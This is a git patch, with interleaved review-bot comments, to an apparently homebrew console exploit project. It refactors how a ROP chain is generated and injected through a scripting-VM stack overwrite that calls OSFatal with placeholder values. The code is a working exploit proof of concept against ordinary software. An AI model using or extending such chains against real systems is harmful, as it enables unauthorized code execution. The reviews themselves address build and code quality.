From 4430db9de0426840cb77d30c6d14946df0a95430 Mon Sep 17 00:00:00 2001 From: jam1garner Date: Fri, 18 Jan 2019 16:06:49 -0500 Subject: [PATCH] Move build process to ROP generation --- kexploit/Makefile | 7 +- kexploit/Scripts | 2 +- kexploit/exploit.mscsb | Bin 2304 -> 0 bytes kexploit/generate_rop.py | 71 ++++++++++++++++ kexploit/payload.s | 120 --------------------------- kexploit/{script_0.s => rop_setup.s} | 37 +-------- 6 files changed, 78 insertions(+), 159 deletions(-) delete mode 100644 kexploit/exploit.mscsb create mode 100644 kexploit/generate_rop.py delete mode 100644 kexploit/payload.s rename kexploit/{script_0.s => rop_setup.s} (88%) diff --git a/kexploit/Makefile b/kexploit/Makefile index cc257e9..e435e49 100644 --- a/kexploit/Makefile +++ b/kexploit/Makefile @@ -1,11 +1,14 @@ all: exploit.mscsb clean: - rm exploit.mscsb payload.s + rm -f exploit.mscsb payload.s main.s -exploit.mscsb: payload.s Scripts script_0.s +exploit.mscsb: payload.s Scripts main.s python3 ../pymsc/asm.py payload.s: payload.bin python3 generate_payload.py +main.s: rop_setup.s + python3 generate_rop.py + diff --git a/kexploit/Scripts b/kexploit/Scripts index 9dd606d..7500d16 100644 --- a/kexploit/Scripts +++ b/kexploit/Scripts @@ -1,3 +1,3 @@ -:script_0.s +:main.s payload.s |exploit.mscsb 
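Review bot: The new `main.s: rop_setup.s` rule lists only the template as a prerequisite, so editing generate_rop.py (which holds the chain constants and loop bound) will not rebuild main.s or exploit.mscsb, and a stale chain gets assembled until someone runs `make clean`. The rule should name the generator too, `main.s: rop_setup.s generate_rop.py`, so that make tracks both inputs. The pre-existing `payload.s: payload.bin` rule appears to have the same gap with generate_payload.py, but that line is outside this change.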
diff --git a/kexploit/exploit.mscsb b/kexploit/exploit.mscsb deleted file mode 100644 index 2ed4688e9410ebaa884a16d13564d69898b28be5..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2304 zcmeI!S8o(o0EXdjcU{)&-qr;h#(=R6#s-_-OfenPJBBg6cQ9=!34Nn4B>yAIMHC4M zAujV%a?3A3&U@BD$rZNv)nGMRS*yuvwpy%KYl_uo zwOdoIX;x%)SktW;)=aC@nq_ra-Byn^+nQtbT63*FtKXVu&9?@uL2H4v&{||Iww72+ zt!377YlXGaT4fDctF1NGT5Fv(Y^}F8SR1WP)@Eyqwbj~Yjab{Q9o9~3m$lp4W9_x} zS^KR6)b=o>(owd$c=dBCYMeCAv*}7s~wXRv$ ztsB-&>y~xf8n^CPcddKYed~dhvmRQHtjE?9>-V;VH25uTKXJlN{`rOzPvmPmU*?!d zykPbx2J}ZAe{6eMmz{V@NinDWo~1C8RZ9ALO+k0aFpZozmd5(4s&rFg^?l3MEy}b7Ud=zb;Z$Wl*vWih3`!^7xzTDOf(wD Zy>V``abFzwNB_OTgm;@E-f=!}{{RrMICB61 diff --git a/kexploit/generate_rop.py b/kexploit/generate_rop.py new file mode 100644 index 0000000..b52fc27 --- /dev/null +++ b/kexploit/generate_rop.py 
@@ -0,0 +1,71 @@
+
+# Addresses
+LOAD_R3_ADDR = 0x0C00C650
+OSFATAL_ADDR = 0x01031618
+
+def write32(u32):
+ global script
+ script += f"pushInt. {hex(u32)}\n"
+
+def writePayloadAddress():
+ global script
+ script += "pushVar. globalVar,mscScriptAddress\n"
+
+def writeEnd():
+ global script
+ script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend"
+
+"""
+Example payload
+
+pushInt. 0xC00C650
+pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal)
+pushInt. 0xBEEF0001
+pushInt. 0xBEEF0002
+pushInt. 0xBEEF0003
+pushInt. 0xBEEF0004
+pushInt. 0xBEEF0005
+pushInt. 0xBEEF0006
+pushInt. 0xBEEF0007
+pushInt. 0xBEEF0008
+pushInt. 0xBEEF0009
+pushInt. 0xBEEF000A
+pushInt. 0xBEEF000B
+pushInt. 0xBEEF000C
+pushInt. 0xBEEF000D
+pushInt. 0xBEEF000E
+pushInt. 0xBEEF000F
+pushInt. 0xBEEF0010
+pushInt. 0xBEEF0011
+pushInt. 0xBEEF0012
+pushInt. 0xBEEF0013
+pushInt. 0xBEEF0014
+pushInt. 0xBEEF0015
+pushInt. 0xBEEF0016
+pushInt. 0xBEEF0017
+pushInt. 0xBEEF0018
+pushInt. 0xBEEF0019
+pushInt. 0xBEEF001A
+pushInt. 0x01031618 #return address (OSFatal)
+
+"""
+
+def writeOSFatalPayload():
+ write32(LOAD_R3_ADDR)
+ writePayloadAddress()
+ for i in range(0x1A):
+ write32(0xBEEF0000 + i + 1)
+ write32(OSFATAL_ADDR)
+ writeEnd()
+
+
+def main():
+ global script
+ with open('rop_setup.s', 'r') as f:
+ script = f.read()
+ writeOSFatalPayload()
+ with open("main.s", 'w') as f:
+ f.write(script)
+
+if __name__ == "__main__":
+ main()
diff --git a/kexploit/payload.s b/kexploit/payload.s
deleted file mode 100644
index ff6977f..0000000
--- a/kexploit/payload.s
+++ /dev/null
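Review bot: Every helper in generate_rop.py appends to a module-level `script` through `global`, yet `script` is never bound at module scope — it only comes into existence once `main()` has read rop_setup.s, so `write32`, `writeEnd` or `writeOSFatalPayload` called from anywhere else (a REPL, a test, a second generator importing this module) raises NameError, and the required call order is hidden in that side effect. The triple-quoted `Example payload` block between `writeEnd` and `writeOSFatalPayload` is an unassigned string expression rather than a comment, and it duplicates by hand the chain that the loop in `writeOSFatalPayload` actually produces, so the two will drift; attach it as that function's docstring or drop it. Having each helper return its fragment and `writeOSFatalPayload` return the joined text removes the global entirely, and `main()` then only concatenates; naming the loop bound next to the other constants (`CHAIN_PAD_WORDS = 0x1A`) would keep all chain parameters in one place.
```python
def write32(u32):
    """Return the MSC line that pushes one 32-bit word onto the chain."""
    return f"pushInt. {hex(u32)}\n"

def writePayloadAddress():
    """Return the line that pushes the script address (the r3 value handed to OSFatal)."""
    return "pushVar. globalVar,mscScriptAddress\n"

def writeEnd():
    return "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend"

def writeOSFatalPayload():
    """Return the chain body as text; touches no module state."""
    parts = [write32(LOAD_R3_ADDR), writePayloadAddress()]
    parts += [write32(0xBEEF0000 + i + 1) for i in range(0x1A)]
    parts += [write32(OSFATAL_ADDR), writeEnd()]
    return "".join(parts)

def main():
    with open('rop_setup.s', 'r') as f:
        setup = f.read()
    with open("main.s", 'w') as f:
        f.write(setup + writeOSFatalPayload())
# … unchanged: address constants above, entry-point guard below …
```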
@@ -1,120 +0,0 @@
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x5f
-byte 0x5f
-byte 0x20
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x5f
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x2f
-byte 0x20
-byte 0x5f
-byte 0x60
-byte 0x20
-byte 0x7c
-byte 0x2f
-byte 0x20
-byte 0x5f
-byte 0x60
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x27
-byte 0x5f
-byte 0x20
-byte 0x5c
-byte 0x20
-byte 0xa
-byte 0x7c
-byte 0x20
-byte 0x28
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x28
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x5f
-byte 0x29
-byte 0x20
-byte 0x7c
-byte 0xa
-byte 0x20
-byte 0x5c
-byte 0x5f
-byte 0x5f
-byte 0x2c
-byte 0x5f
-byte 0x7c
-byte 0x5c
-byte 0x5f
-byte 0x5f
-byte 0x2c
-byte 0x5f
-byte 0x7c
-byte 0x5f
-byte 0x2e
-byte 0x5f
-byte 0x5f
-byte 0x2f
-byte 0x20
-byte 0x0
diff --git a/kexploit/script_0.s b/kexploit/rop_setup.s
similarity index 88%
rename from kexploit/script_0.s
rename to kexploit/rop_setup.s
index b55ad39..79a1bb2 100644
--- a/kexploit/script_0.s
+++ b/kexploit/rop_setup.s
@@ -758,39 +758,4 @@ pushShort. 0x80 #Now we can overwrite the stack position with the one we calculated earlier to jump to the write position pushVar. globalVar,calculatedStackPosition -#Write ROP chain -pushInt. 0xC00C650 -pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal) -pushInt. 0xBEEF0001 -pushInt. 0xBEEF0002 -pushInt. 0xBEEF0003 -pushInt. 0xBEEF0004 -pushInt. 0xBEEF0005 -pushInt. 0xBEEF0006 -pushInt. 0xBEEF0007 -pushInt. 0xBEEF0008 -pushInt. 0xBEEF0009 -pushInt. 0xBEEF000A -pushInt. 0xBEEF000B -pushInt. 0xBEEF000C -pushInt. 0xBEEF000D -pushInt. 0xBEEF000E -pushInt. 0xBEEF000F -pushInt. 0xBEEF0010 -pushInt. 0xBEEF0011 -pushInt. 0xBEEF0012 -pushInt. 0xBEEF0013 -pushInt. 0xBEEF0014 -pushInt. 0xBEEF0015 -pushInt. 0xBEEF0016 -pushInt. 0xBEEF0017 -pushInt. 0xBEEF0018 -pushInt. 0xBEEF0019 -pushInt. 0xBEEF001A -pushInt. 0x01031618 #return address (OSFatal) - -#Execute ROP chain -exit - -#Dunno why but I figured I might as well put it here, should never hit this though -end +#Write ROP Chain
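Review bot: The file now ends on the comment line `#Write ROP Chain`, and generate_rop.py appends its first `pushInt.` straight onto the text read from this file with no separator, so the assembled chain depends on rop_setup.s ending with a newline — without one, the first chain entry becomes part of the comment and silently disappears from main.s. The hunk shows no "No newline at end of file" marker, so this presumably holds today, but it is an easy thing for an editor to change. Either end this file with an explicit blank line after the comment, or make the generator normalise the template before appending, e.g. `setup = f.read().rstrip('\n') + '\n'` in `main()`.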